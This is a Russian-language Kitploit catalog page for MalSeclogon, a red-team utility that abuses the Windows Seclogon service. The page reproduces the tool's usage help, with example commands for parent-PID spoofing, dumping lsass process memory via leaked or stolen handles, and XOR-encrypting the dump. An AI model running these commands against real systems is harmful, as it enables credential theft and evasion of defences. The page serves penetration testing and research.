Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
MalSeclogon — Небольшая утилита для работы с сервисом Seclogon | Kitploit
Инструменты/GitHubGitHub/antoniococo/malseclogon
Повышение привилегийКриминалистика памятиЭксплуатацияЛатеральное перемещениеПост-эксплуатацияRed Teaming
GitHubantoniococo/malseclogon

MalSeclogon

Небольшая утилита для работы с сервисом Seclogon

Репозиторий
3274914 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

MalSeclogon

Небольшой инструмент для работы со службой Seclogon.

Полные технические подробности:

  • https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
  • https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html

Использование

root@kitploit:~
        MalSeclogon v0.2
        @splinter_code

Args:
-p Pid of the process to spoof the PPID through seclogon service
-d Dump lsass method
        1 = Dump lsass by using leaked handles
        2 = Dump lsass by using leaked handles and cloned lsass process
        3 = Dump lsass by stealing handle from seclogon. (Default)
-o Output path of the dump (default C:\lsass.dmp)
-c Commandline of the spoofed process, default: cmd.exe (not compatible with -d)
-k Xor key to encrypt the dump. Compatible only with -d 3. Allowed values 1-255. Default = 40.
-f Path to an encrypted dump file. This decrypt the dump. If no -k key are specified the default value is 40.

Examples:
- Run a process with a spoofed PPID:
        Malseclogon.exe -p [PPID] -c cmd.exe
- Dump lsass by using leaked handles:
        Malseclogon.exe -d 1
- Dump lsass by using leaked handles and cloned lsass process:
        Malseclogon.exe -d 2
- Dump lsass by stealing handle from seclogon using xor key 40:
        Malseclogon.exe -d 3 -o C:\lsass.dmp.xor -k 40
- Decrypt an lsass dmp file with the key 40:
        Malseclogon.exe -f C:\lsass.dmp.xor -k 40

Инструкции по сборке

Не собирайте версии «Debug» или «x86». Скомпилированный бинарный файл не будет работать при использовании этих сборок. Правильная сборка — «Release x64».

Скачать инструмент